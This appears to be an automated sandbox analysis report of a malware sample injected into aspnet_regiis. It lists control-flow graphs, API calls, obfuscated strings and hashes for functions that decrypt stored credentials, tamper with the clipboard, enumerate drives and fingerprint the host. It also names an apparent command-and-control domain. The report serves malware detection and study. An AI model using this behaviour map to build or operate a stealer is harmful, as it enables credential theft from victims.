                                                                              control_flow_graph 429 2782e78-2782e7e 430 2782e80-2782e85 429->430 431 2782e87 429->431 432 2782e8a-2782ea8 call 2768010 RtlExpandEnvironmentStrings 430->432 431->432 435 2782eaf 432->435 436 2782eb7-2782ec2 432->436 435->436 437 2782ecb 436->437 438 2782ec4-2782ec9 436->438 439 2782ed2-2782f08 call 2768010 437->439 438->439 442 2782f10-2782f49 439->442 442->442 443 2782f4b-2782f55 442->443 444 2782f71-2782f7d 443->444 445 2782f57-2782f5f 443->445 447 2782f7f-2782f83 444->447 448 2782fa1-2782fb9 call 279fd30 444->448 446 2782f60-2782f6f 445->446 446->444 446->446 449 2782f90-2782f9f 447->449 452 2783128-2783132 448->452 453 27832ca-2783371 448->453 454 278313a-278315e 448->454 455 27832af 448->455 456 2782fd0-2782fd9 448->456 457 2782fc0-2782fc7 448->457 458 27832c4 448->458 459 27832b5-27832bb call 2768020 448->459 449->448 449->449 452->454 464 2783380-27833a4 453->464 460 2783160-27831c4 454->460 455->459 462 2782fdb-2782fe0 456->462 463 2782fe2 456->463 457->456 458->453 459->458 460->460 467 27831c6-278324a 460->467 465 2782fe9-278308f call 2768010 462->465 463->465 464->464 466 27833a6-27833b2 call 2780d80 464->466 475 2783090-27830a2 465->475 473 27833b7-27833ba 466->473 471 2783250-278327e 467->471 471->471 474 2783280-27832ab call 2780810 471->474 478 27833c2-27833cb call 2768020 473->478 474->455 475->475 477 27830a4-27830ac 475->477 480 27830ae-27830b5 477->480 481 27830d1-27830dd 477->481 487 27833d0 478->487 483 27830c0-27830cf 480->483 485 27830df-27830e3 481->485 486 2783101-2783121 GetLogicalDrives call 279fd30 481->486 483->481 483->483 488 27830f0-27830ff 485->488 486->452 486->454 486->455 486->458 486->459 486->478 486->487 491 27833d6 486->491 492 27833dc-27833e2 call 2768020 486->492 493 27833e5-27833f1 486->493 487->491 488->486 488->488 491->492 492->493
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?), ref: 02782E9D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: #A0C$'Q+S$'Y<[$(]`_$*U2W$;E5G$SZ$\E$jY
                                                                              • API String ID: 237503144-3412361877
                                                                              • Opcode ID: 8e1eafd269693140d507ef27daac54dea48caf89035b347da837576f8aeebd44
                                                                              • Instruction ID: 7c51fe5cdf95925bc4659af90ed8a3710d416e5ff387d66c43e58e5afdd30005
                                                                              • Opcode Fuzzy Hash: 8e1eafd269693140d507ef27daac54dea48caf89035b347da837576f8aeebd44
                                                                              • Instruction Fuzzy Hash: FED1DFB55483408FC710AF29D89126BBBE5FFC6724F188E2DE8D58B351E7788901CB86
                                                                              Function 04D01000 Relevance: 19.6, APIs: 13, Instructions: 81clipboardsleepmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • Sleep.KERNELBASE(00000001), ref: 04D01032
                                                                              • OpenClipboard.USER32(00000000), ref: 04D0103C
                                                                              • GetClipboardData.USER32(0000000D), ref: 04D0104C
                                                                              • GlobalLock.KERNEL32(00000000), ref: 04D0105D
                                                                              • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 04D01090
                                                                              • GlobalLock.KERNEL32 ref: 04D010A0
                                                                              • GlobalUnlock.KERNEL32 ref: 04D010C1
                                                                              • EmptyClipboard.USER32 ref: 04D010CB
                                                                              • SetClipboardData.USER32(0000000D), ref: 04D010D6
                                                                              • GlobalFree.KERNEL32 ref: 04D010E3
                                                                              • GlobalUnlock.KERNEL32(?), ref: 04D010ED
                                                                              • CloseClipboard.USER32 ref: 04D010F3
                                                                              • GetClipboardSequenceNumber.USER32 ref: 04D010F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3271938113.0000000004D01000.00000020.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                                              • Associated: 00000003.00000002.3271916145.0000000004D00000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271964312.0000000004D02000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4d00000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                              • String ID:
                                                                              • API String ID: 1416286485-0
                                                                              • Opcode ID: 03f6d21890db35c9d304e1779699a0ddd8b3bd3d61121f9928ed697ccb20a04f
                                                                              • Instruction ID: 08257b8158d52b8c5ad83d002f4fa65f604f95e988cc614ecb5d493faed6efc7
                                                                              • Opcode Fuzzy Hash: 03f6d21890db35c9d304e1779699a0ddd8b3bd3d61121f9928ed697ccb20a04f
                                                                              • Instruction Fuzzy Hash: 7921A1317062609BDB246B71AC0DB6E77E8FF04785F04806CF9C5D7291EA66AC80C6A3
                                                                              Function 02775050 Relevance: 16.7, APIs: 1, Strings: 8, Instructions: 939encryptionCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 518 2775050-2775067 519 2775070-2775078 518->519 519->519 520 277507a-27750a9 519->520 521 27750b2 520->521 522 27750ab-27750b0 520->522 523 27750b5-2775116 call 2768010 521->523 522->523 526 2775120-27751a0 523->526 526->526 527 27751a6-27751b6 526->527 528 27751d1-27751e1 527->528 529 27751b8-27751bf 527->529 531 27751e3-27751ea 528->531 532 2775201-2775225 call 279fba0 528->532 530 27751c0-27751cf 529->530 530->528 530->530 533 27751f0-27751ff 531->533 536 2775435-277543b call 2768020 532->536 537 27754d2-27754d8 call 2768020 532->537 538 2775420-2775426 call 2768020 532->538 539 2775600 532->539 540 277542f 532->540 541 277543e-2775452 532->541 542 277524e-2775275 call 2768010 call 279ffb0 532->542 543 27754cc 532->543 544 277522c-2775247 call 279fee0 532->544 545 277527c-2775283 532->545 546 27754db-27754e7 532->546 533->532 533->533 536->541 537->546 538->540 549 2775460-277548c 541->549 542->536 542->537 542->538 542->539 542->540 542->541 542->545 542->546 564 2775615-2775617 542->564 565 277561c 542->565 566 2775606 542->566 567 2775622-2775628 call 2768020 542->567 568 277560c-2775612 call 2768020 542->568 569 277562b-2775656 call 279fee0 542->569 544->536 544->537 544->538 544->539 544->540 544->541 544->542 544->545 544->546 544->564 544->565 544->566 544->567 544->568 544->569 550 2775290-2775298 545->550 554 27754f0 546->554 555 27754e9-27754ee 546->555 549->549 559 277548e-2775496 549->559 550->550 560 277529a-27752b6 550->560 556 27754f3-277554f call 2768010 554->556 555->556 584 2775550-2775575 556->584 559->543 572 2775498-27754a7 559->572 573 27752c3-27752c7 560->573 574 27752b8-27752c1 560->574 577 2778c32-2778c39 564->577 567->569 568->564 593 27756c3-27756c9 call 2768020 569->593 594 27756a2-27756b6 call 2761000 569->594 595 2775691 569->595 596 277565d-277568a call 2768010 call 279ffb0 569->596 597 27756cc-27756df 569->597 580 27754b0-27754b7 572->580 582 27752ca-277534a call 2768010 573->582 574->582 586 27754c0-27754c6 580->586 587 27754b9-27754bc 580->587 606 2775350-2775392 582->606 584->584 590 2775577-2775585 584->590 586->543 592 2775a6e-2775a7d call 279cca0 586->592 587->580 591 27754be 587->591 601 2775587-277558f 590->601 602 27755a1-27755b1 590->602 591->543 626 2775a86 592->626 593->597 594->593 595->594 596->593 596->594 596->595 596->597 604 27756e0-277570c 597->604 609 2775590-277559f 601->609 611 27755b3-27755ba 602->611 612 27755d1-27755f5 call 279fba0 602->612 604->604 613 277570e-277571d 604->613 606->606 615 2775394-277539e 606->615 609->602 609->609 616 27755c0-27755cf 611->616 612->539 612->564 612->565 612->566 612->567 612->568 612->569 612->593 612->594 612->595 612->596 612->597 618 277571f-277572f 613->618 619 277575a-27757c3 call 2761a70 613->619 621 27753c1-27753d9 615->621 622 27753a0-27753a7 615->622 616->612 616->616 629 2775730-2775737 618->629 641 27757d0-2775805 619->641 624 2775403 621->624 625 27753db-27753e6 621->625 623 27753b0-27753bf 622->623 623->621 623->623 632 2775407-277541a call 2768cd0 624->632 631 27753f0-27753ff 625->631 633 2775a8d-2775ac8 call 2768010 626->633 635 2775740-2775746 629->635 636 2775739-277573c 629->636 631->631 638 2775401 631->638 632->538 648 2775ad0-2775af4 633->648 635->619 637 2775748-2775757 call 279cca0 635->637 636->629 642 277573e 636->642 637->619 638->632 641->641 646 2775807-277581e call 2761db0 641->646 642->619 654 2775907-2775913 call 2768020 646->654 655 2775b86-2775b9f call 279e640 646->655 656 2775ba5-2775c07 646->656 657 2775825-2775827 646->657 658 2775a21-2775a28 646->658 659 2775b7d-2775b83 call 2768020 646->659 660 27758fa 646->660 648->648 650 2775af6-2775afe 648->650 652 2775b21-2775b38 650->652 653 2775b00-2775b05 650->653 666 2775b61-2775b77 call 2768cd0 652->666 667 2775b3a-2775b41 652->667 663 2775b10-2775b1f 653->663 654->656 655->656 668 2775c10-2775c2a 656->668 665 2775830-2775836 657->665 669 2775a30-2775a38 658->669 659->655 660->654 663->652 663->663 665->665 674 2775838-2775858 665->674 666->659 675 2775b50-2775b5f 667->675 668->668 676 2775c2c-2775c47 call 2761db0 668->676 669->669 677 2775a3a-2775a65 669->677 681 277585f 674->681 682 277585a-277585d 674->682 675->666 675->675 676->577 676->654 676->655 676->656 676->658 676->659 676->660 677->626 679 2775a67-2775a6c 677->679 679->633 683 2775860-2775870 681->683 682->681 682->683 686 2775877 683->686 687 2775872-2775875 683->687 688 2775878-277588e call 2768010 686->688 687->686 687->688 691 2775894-27758f3 call 279e640 CryptUnprotectData 688->691 692 2775918-277591f 688->692 691->654 691->655 691->656 691->658 691->659 691->660 694 2775944-2775990 call 277ce50 * 2 692->694 700 2775992-27759a9 call 277ce50 694->700 701 2775930-277593e 694->701 700->701 704 27759ab-27759dc 700->704 701->691 701->694 704->701 705 27759e2-27759fc call 277ce50 704->705 705->701 708 2775a02-2775a1c 705->708 708->701
                                                                              APIs
                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 027758EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: CryptDataUnprotect
                                                                              • String ID: $W#Q$J\$M1IJ$U)QR$V9$ZX^M$g`a$ke
                                                                              • API String ID: 834300711-4063897482
                                                                              • Opcode ID: afcaf4c01fec2214bb501cd1f8c34cd700a45838d44deedd8aa979beb58c61f7
                                                                              • Instruction ID: 154a07f21d45199b1c86c99a9506db3120571857657f82e3bbcf948aaf9f4161
                                                                              • Opcode Fuzzy Hash: afcaf4c01fec2214bb501cd1f8c34cd700a45838d44deedd8aa979beb58c61f7
                                                                              • Instruction Fuzzy Hash: FA5237B19093418BDB25DF24C855BAFB7E2FFC5314F48496CE8998B291E7349805CB93
                                                                              Function 0276DDBE Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 303COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 709 276ddbe-276dde3 call 27697d0 CoUninitialize 712 276ddf0-276de17 709->712 712->712 713 276de19-276de31 712->713 714 276de40-276de77 713->714 714->714 715 276de79-276debb 714->715 716 276dec0-276deec 715->716 716->716 717 276deee-276def8 716->717 718 276defa-276deff 717->718 719 276df0b-276df13 717->719 720 276df00-276df09 718->720 721 276df15-276df1f 719->721 722 276df2d-276df30 719->722 720->719 720->720 723 276df20-276df29 721->723 724 276df33-276df3b 722->724 723->723 725 276df2b 723->725 726 276df5d 724->726 727 276df3d-276df41 724->727 725->724 729 276df60-276df6b 726->729 728 276df50-276df59 727->728 728->728 732 276df5b 728->732 730 276df6d-276df6f 729->730 731 276df7b-276df86 729->731 733 276df70-276df79 730->733 734 276df9b-276dfa7 731->734 735 276df88-276df89 731->735 732->729 733->731 733->733 737 276dfc1-276e074 734->737 738 276dfa9-276dfab 734->738 736 276df90-276df99 735->736 736->734 736->736 740 276e080-276e092 737->740 739 276dfb0-276dfbd 738->739 739->739 741 276dfbf 739->741 740->740 742 276e094-276e0af 740->742 741->737 743 276e0b0-276e0c2 742->743 743->743 744 276e0c4-276e0de call 276b870 743->744 746 276e0e3-276e0fd 744->746
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: Uninitialize
                                                                              • String ID: +-1'$:!2-$fancywaxxers.shop$gbal$kZ[X$k{$}:
                                                                              • API String ID: 3861434553-2198633159
                                                                              • Opcode ID: a7b1ae6a466766b399f7690918eab394d6a5ab7f39cf90ef54bc91c2bcbc1618
                                                                              • Instruction ID: d3e831118fce4969baf0ce41c0c075c419e903303a802fee97468c44eee54d8d
                                                                              • Opcode Fuzzy Hash: a7b1ae6a466766b399f7690918eab394d6a5ab7f39cf90ef54bc91c2bcbc1618
                                                                              • Instruction Fuzzy Hash: D391E2742187808FD72A8F29C0E4662BFA1FF57300B18969CC9E64F756D7359816CFA1
                                                                              Function 02771CE0 Relevance: 11.3, APIs: 3, Strings: 2, Instructions: 2539COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: D$`
                                                                              • API String ID: 0-881360112
                                                                              • Opcode ID: 3a2477d08d458eeaede933dc5b5e4cd37b9afa9357319523f1bfde47b6284203
                                                                              • Instruction ID: 6fe1732504106b32fb4ce6eb9a2a2ddee9f3d5fce354060a5d56e1b08d3bbec5
                                                                              • Opcode Fuzzy Hash: 3a2477d08d458eeaede933dc5b5e4cd37b9afa9357319523f1bfde47b6284203
                                                                              • Instruction Fuzzy Hash: 25331771D083908FDB11CB38C849799BFF1AB46320F0986E9D8A9AB3D2D7758945CB52
                                                                              Function 02768790 Relevance: 7.7, APIs: 5, Instructions: 219threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1278 2768790-27687a1 call 279c410 1281 27687a7-27687ae call 2795130 1278->1281 1282 2768a2c-2768a2e ExitProcess 1278->1282 1285 2768a27 call 279cbf0 1281->1285 1286 27687b4-27687da GetCurrentProcessId GetCurrentThreadId 1281->1286 1285->1282 1287 27687e0-2768885 SHGetSpecialFolderPathW 1286->1287 1288 27687dc-27687de 1286->1288 1290 2768890-27688d3 1287->1290 1288->1287 1290->1290 1291 27688d5-2768901 call 279b100 1290->1291 1294 2768910-276892c 1291->1294 1295 2768946-276895d GetForegroundWindow 1294->1295 1296 276892e-2768944 1294->1296 1297 2768963-27689ef 1295->1297 1298 27689f1-2768a09 call 2769d30 1295->1298 1296->1294 1297->1298 1301 2768a15-2768a1c 1298->1301 1302 2768a0b call 276cd50 1298->1302 1301->1285 1304 2768a1e-2768a24 call 2768020 1301->1304 1305 2768a10 call 276b840 1302->1305 1304->1285 1305->1301
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 027687B4
                                                                              • GetCurrentThreadId.KERNEL32 ref: 027687BE
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000,?), ref: 02768863
                                                                              • GetForegroundWindow.USER32 ref: 02768955
                                                                              • ExitProcess.KERNEL32 ref: 02768A2E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 4063528623-0
                                                                              • Opcode ID: 33dc20622c36e73fd32f09ac42a7cae0ec7ccdcf87c1143b812b703ce1f4fb8e
                                                                              • Instruction ID: 823df192b9c25474e33b9098927d18b6abc52d254c97a5b2d705cdf32212d192
                                                                              • Opcode Fuzzy Hash: 33dc20622c36e73fd32f09ac42a7cae0ec7ccdcf87c1143b812b703ce1f4fb8e
                                                                              • Instruction Fuzzy Hash: B9514B73B443054FD718AF69CC1D36AB7D79BC4320F0EC53E99859B791DA3898058B82
                                                                              Function 02792700 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 198COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1309 2792700-27927ec GetSystemMetrics * 2 1315 27927f3-2792cd5 1309->1315
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-3916222277
                                                                              • Opcode ID: 77290c8b0d7ccb8ee1ac81108fd47db9f549f504b0fa58f65b46e869f0043fcf
                                                                              • Instruction ID: 7a8d9fa8ed1e41501d193890b2731aec7a3fa8cf8f4d1464a258fedc605c8d65
                                                                              • Opcode Fuzzy Hash: 77290c8b0d7ccb8ee1ac81108fd47db9f549f504b0fa58f65b46e869f0043fcf
                                                                              • Instruction Fuzzy Hash: 65D15CB02093808FDB34DF66E65879FFBE2BBC5318F519A6DD4985B280D77484588F82
                                                                              Function 0278BE6E Relevance: 2.1, APIs: 1, Instructions: 629COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0278C1FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                              • String ID:
                                                                              • API String ID: 3960555810-0
                                                                              • Opcode ID: 9886148821e53498758abeca54bb9da236227ce3d6086cfc699dd35a8f4598a5
                                                                              • Instruction ID: 5b6af6037c6b191bbbad728cf0c3efc6ff1e8b8889056be0461052d1f87aa58f
                                                                              • Opcode Fuzzy Hash: 9886148821e53498758abeca54bb9da236227ce3d6086cfc699dd35a8f4598a5
                                                                              • Instruction Fuzzy Hash: E102B1705047828BD71A8F39C490762FBE1AF5B314F28859EC4DA9B792D735A406CB64
                                                                              Function 0278A90B Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0278A9A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID:
                                                                              • API String ID: 3545744682-0
                                                                              • Opcode ID: cd2079c03bd74a051166c123acf07ebb9b8da3924e18dc5383dce14aa83a3acf
                                                                              • Instruction ID: a46190ac2a41865ae164202b611cd3b255e842235844006a81c5e0f47ed1774b
                                                                              • Opcode Fuzzy Hash: cd2079c03bd74a051166c123acf07ebb9b8da3924e18dc5383dce14aa83a3acf
                                                                              • Instruction Fuzzy Hash: 60113130605282CBDB198F31C891727BBE2EB8A310F19C89EC09BDB745CB34D802CB20
                                                                              Function 0278A8C6 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0278A9A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID:
                                                                              • API String ID: 3545744682-0
                                                                              • Opcode ID: 61cb7b54e4a37f96bc7a09cadbd80dbce03a1e2fae850304110620c361c7fd98
                                                                              • Instruction ID: 878df5a18d267391074499eb09945fb7a547fe800b03bfb0714117da8f251ee0
                                                                              • Opcode Fuzzy Hash: 61cb7b54e4a37f96bc7a09cadbd80dbce03a1e2fae850304110620c361c7fd98
                                                                              • Instruction Fuzzy Hash: 581101356452828FDB198F30D891727BBA2EB4A210F19C89ED49BEB745C735E802CB20
                                                                              Function 0279CCA0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0279FB7B,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0279CCCE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                              Function 0278A55F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1318 278a55f-278a567 1319 278a569-278a56a 1318->1319 1320 278a57b-278a9f9 1318->1320 1321 278a570-278a579 1319->1321 1323 278aa00-278aa5c 1320->1323 1321->1320 1321->1321 1323->1323 1324 278aa5e-278aa63 1323->1324 1325 278aa8d-278aa96 1324->1325 1326 278aa65-278aa72 1324->1326 1328 278aa99-278aad1 GetComputerNameExA 1325->1328 1327 278aa80-278aa89 1326->1327 1327->1327 1329 278aa8b 1327->1329 1329->1328
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0278AAAC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID: EXCm$_RV]
                                                                              • API String ID: 3545744682-74084992
                                                                              • Opcode ID: f3b9b520b57548f7ef2776ea4c09f1b2de0814eae6a7862ef424d87f6bfc0997
                                                                              • Instruction ID: 243b2276877bf6eff03c7995b7effb61a64ba8bdca7a1914cbeb6e2b0754677b
                                                                              • Opcode Fuzzy Hash: f3b9b520b57548f7ef2776ea4c09f1b2de0814eae6a7862ef424d87f6bfc0997
                                                                              • Instruction Fuzzy Hash: 5E3107752407428FD7188F29C490776FBD2EF96210B1DC65EC4E787792DB78A845CB11
